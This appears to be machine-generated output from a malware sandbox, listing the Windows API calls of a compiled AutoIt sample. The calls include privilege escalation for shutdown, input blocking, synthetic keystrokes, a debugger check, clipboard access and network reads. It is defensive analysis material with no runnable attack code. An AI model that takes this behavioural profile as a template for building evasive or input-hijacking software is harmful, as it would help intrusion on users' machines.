                                                                                                                                                                                                                                                                              • Part of subcall function 00C5EAB0: GetFileAttributesW.KERNEL32(?,00C5D840), ref: 00C5EAB1
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C5D9CD
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C5DA88
                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C5DA9B
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C5DAB8
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5DAE2
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C5DAC7,?,?), ref: 00C5DB5D
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 00C5DAFE
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C5DB0F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                            • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5205A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C52087
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52010: GetLastError.KERNEL32 ref: 00C52097
                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00C5F249
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                            • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2BD54
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2BD78
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2BEFF
                                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C946D0), ref: 00C2BF11
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00CC221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C2BF89
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00CC2270,000000FF,?,0000003F,00000000,?), ref: 00C2BFB6
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2C0CB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 314583886-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C356C2,?,?,00000000,00000000), ref: 00C63A1E
                                                                                                                                                                                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C356C2,?,?,00000000,00000000), ref: 00C63A35
                                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00C356C2,?,?,00000000,00000000,?,?,?,?,?,?,00BF66CE), ref: 00C63A45
                                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00C356C2,?,?,00000000,00000000,?,?,?,?,?,?,00BF66CE), ref: 00C63A56
                                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00C356C2,?,?,00C356C2,?,?,00000000,00000000,?,?,?,?,?,?,00BF66CE,?), ref: 00C63A65
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                            • String ID: SCRIPT
                                                                                                                                                                                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C51916
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C51922
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C51931
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C51938
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C5194E
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00C51C81), ref: 00C520FB
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C52107
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C5210E
                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C52127
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00C51C81), ref: 00C5213B
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C52142
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C6A5BD
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C6A6D0
                                                                                                                                                                                                                                                                              • Part of subcall function 00C642B9: GetInputState.USER32 ref: 00C64310
                                                                                                                                                                                                                                                                              • Part of subcall function 00C642B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C643AB
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C6A5ED
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C6A6BA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                            • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,?), ref: 00BF233E
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00BF2421
                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00BF2434
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Color$Proc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 929743424-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C73AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C73AD7
                                                                                                                                                                                                                                                                              • Part of subcall function 00C73AAB: _wcslen.LIBCMT ref: 00C73AF8
                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C722BA
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C722E1
                                                                                                                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00C72338
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C72343
                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00C72372
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00C6D8CE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00C6D92F
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 00C6D943
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 234945975-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,00C346AC), ref: 00C5E482
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C5E491
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C5E4A2
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C5E4AE
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                                                                            • String ID: %.3d$X64
                                                                                                                                                                                                                                                                            • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00C22A8A
                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00C22A94
                                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00C22AA1
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00C109D8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00C109F5
                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5205A
                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C52087
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C52097
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 577356006-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,00C1502E,?,00CB98D8,0000000C,00C15185,?,00000002,00000000), ref: 00C15079
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00C1502E,?,00CB98D8,0000000C,00C15185,?,00000002,00000000), ref: 00C15080
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00C15092
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00C5ED04
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: mouse_event
                                                                                                                                                                                                                                                                            • String ID: DOWN
                                                                                                                                                                                                                                                                            • API String ID: 2434400541-711622031
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00C4E664
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                                                            • String ID: X64
                                                                                                                                                                                                                                                                            • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C752EE,?,?,00000035,?), ref: 00C64229
                                                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C752EE,?,?,00000035,?), ref: 00C64239
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C5BC24
                                                                                                                                                                                                                                                                            • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00C5BC37
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C51B48), ref: 00C51A20
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00C51B48), ref: 00C51A35
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 81990902-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • BlockInput.USER32(00000001), ref: 00C6F51A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: BlockInput
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00C1075E), ref: 00C10D4A
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C7358D
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C735A0
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 00C735AF
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C735CA
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C735D1
                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00C73700
                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C7370E
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C73755
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00C73761
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C7379D
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C737BF
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C737D2
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C737DD
                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C737E6
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C737F5
                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C737FE
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C73805
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00C73810
                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C73822
                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C90C04,00000000), ref: 00C73838
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00C73848
                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00C7386E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C7388D
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C738AF
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C73A9C
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00C87B67
                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C87B98
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00C87BA4
                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00C87BBE
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00C87BCD
                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00C87BF8
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 00C87C00
                                                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00C87C07
                                                                                                                                                                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 00C87C16
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C87C1D
